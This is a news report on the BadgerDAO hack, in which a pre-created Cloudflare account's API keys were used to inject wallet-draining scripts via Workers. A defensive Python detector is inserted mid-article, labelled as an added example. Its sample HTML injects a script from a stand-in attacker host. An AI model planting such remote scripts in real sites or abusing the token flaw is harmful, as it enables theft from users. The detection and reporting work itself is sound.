The team behind the DeFi protocol BadgerDAO has published details of its recent hack and reported that the attackers used the Cloudflare Workers service, which lets customers deploy scripts that run on Cloudflare's edge network.
We believe that all remediation decisions should be made as a community with strong consideration for the long term health of the DAO and victims of this incident.
You can review a detailed technical post mortem of the incident below.
– ₿adgerDAO 🦡 (@BadgerDAO) December 10, 2021
The developers drew attention to a message that appeared on the Cloudflare community forum at the end of September. One participant noticed that users with unverified accounts could register an account and create and view API tokens, and that those tokens could not be deleted or deactivated until email verification of the account was completed.
An attacker could therefore register an account in someone else's name, generate API keys, and simply wait for the legitimate owner to verify and complete the account, at which point the attacker's keys became valid and granted API access.
After the incident, the BadgerDAO team analyzed its Cloudflare logs and found traces of unauthorized account registration and the generation of three API keys.
In mid-September the developers "unknowingly completed account registration" for one of the compromised accounts, which was then "used for legitimate Cloudflare management activities."
"The user interface does not make it clear that the account has already been created, so a key was generated for the API. On November 10, an attacker used API access to inject malicious scripts through Cloudflare Workers into the HTML file of the app.badger.com website," the developers wrote.
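The injection described above happens at the edge: a Worker rewrites the response on its way to the browser, so the files on the origin server remain unchanged and a review of the deployed build finds nothing wrong. The check a defender wants is a comparison of what the origin serves with what the CDN actually delivers. The following is an added example, not code from BadgerDAO or Cloudflare: it builds an inventory of `<script>` elements (external sources plus SHA-256 hashes of inline bodies) from two HTML documents and reports anything present in the served copy that is absent from the baseline. The two HTML strings and the `attacker.invalid` host are constructed sample input; in practice the baseline would be fetched directly from the origin (or taken from the deploy artifact) and the served copy through Cloudflare.

```python
"""Detect script tags added to served HTML by diffing against a known-good baseline.

Added example, not part of the original article or the BadgerDAO project.
"""
import hashlib
from html.parser import HTMLParser


class _ScriptCollector(HTMLParser):
    """Collect every <script> as ("src", url) or ("inline", sha256-of-body)."""

    def __init__(self):
        super().__init__()
        self._in_script = False
        self._buf = []
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.scripts.append(("src", src))
        else:
            # Inline script: HTMLParser delivers the raw body via handle_data.
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            body = "".join(self._buf).strip().encode()
            self.scripts.append(("inline", hashlib.sha256(body).hexdigest()))
            self._in_script = False


def script_inventory(html):
    """Return the set of scripts referenced or embedded in an HTML document."""
    parser = _ScriptCollector()
    parser.feed(html)
    parser.close()
    return set(parser.scripts)


def find_injected_scripts(baseline_html, served_html):
    """Scripts in the served page that the baseline does not contain.

    A modified inline script shows up as a new ("inline", <hash>) entry,
    because its body no longer hashes to the baseline value.
    """
    return sorted(script_inventory(served_html) - script_inventory(baseline_html))


# Constructed sample input: what the origin serves ...
BASELINE_HTML = """<html><head>
<script src="/static/app.js"></script>
<script>window.__cfg = {version: 1};</script>
</head><body></body></html>"""

# ... and what the CDN delivered, with one extra external script (constructed,
# .invalid TLD so it can never resolve).
SERVED_HTML = BASELINE_HTML.replace(
    "</head>",
    '<script src="https://attacker.invalid/drain.js"></script></head>',
)

if __name__ == "__main__":
    for kind, value in find_injected_scripts(BASELINE_HTML, SERVED_HTML):
        print(f"unexpected {kind} script: {value}")
```

Run this on a schedule from a host outside Cloudflare, fetching the baseline with the origin's IP and the served copy through the public hostname; an alert on any difference catches edge-side tampering regardless of which API key, Worker or rule introduced it. A strict `Content-Security-Policy` with `script-src` allowlisting or SRI hashes complements the check, but note that a Worker that can rewrite the body can also rewrite response headers, so the out-of-band comparison remains the more trustworthy signal.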
The attacker stole assets worth more than $130 million, but about $9 million may be recoverable, since those funds have not yet been withdrawn from the protocol's vaults. The net damage therefore exceeds $121 million.
The project team reported that it has already closed the hole that made the attack possible, changed the password of the Cloudflare account, and removed or rotated its API keys.
Because the attacker has not yet been identified, BadgerDAO brought in Mandiant and Chainalysis to investigate the incident. The developers added that they are cooperating with law enforcement agencies in the United States and Canada.
Speaking to Bloomberg, a Cloudflare spokesperson stressed that the company's systems "were not hacked" and that there are no vulnerabilities in the Workers service.
"Last week we learned about the BadgerDAO incident. We contacted the project team and provided active assistance in the investigation," he said.
As a reminder, in September unknown persons gained unauthorized access to Bitcoin.org and posted a fraudulent cryptocurrency giveaway announcement on its main page. Site operator Cobra suggested at the time that the issue might be related to Cloudflare's services.